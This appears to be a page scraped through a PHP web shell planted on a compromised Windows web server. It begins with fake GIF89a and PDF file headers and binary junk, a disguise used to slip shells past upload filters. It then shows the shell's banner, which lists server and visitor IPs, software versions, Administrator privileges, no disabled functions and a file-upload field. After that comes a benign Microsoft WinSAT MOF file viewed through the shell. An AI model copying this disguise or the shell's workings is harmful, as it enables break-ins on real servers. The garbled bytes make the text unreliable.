GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Windows/System32/wbem/ |
Upload File : |
/* \file WinsatUninstall.mof \author Yannis Minadakis (yannism) This file will unregister the mof classess registered by Winsat.mof. Copyright (c) 2005 Microsoft Corporation */ // Place the WinSAT provider in the root\CIMV2 namespace #pragma namespace("\\\\.\\ROOT\\CIMV2") // Destory the instance of WinSAT #pragma deleteinstance ( "$Winsat", nofail ) // Remove the winSAT class from the repository #pragma deleteclass( "Win32_WinSAT", nofail )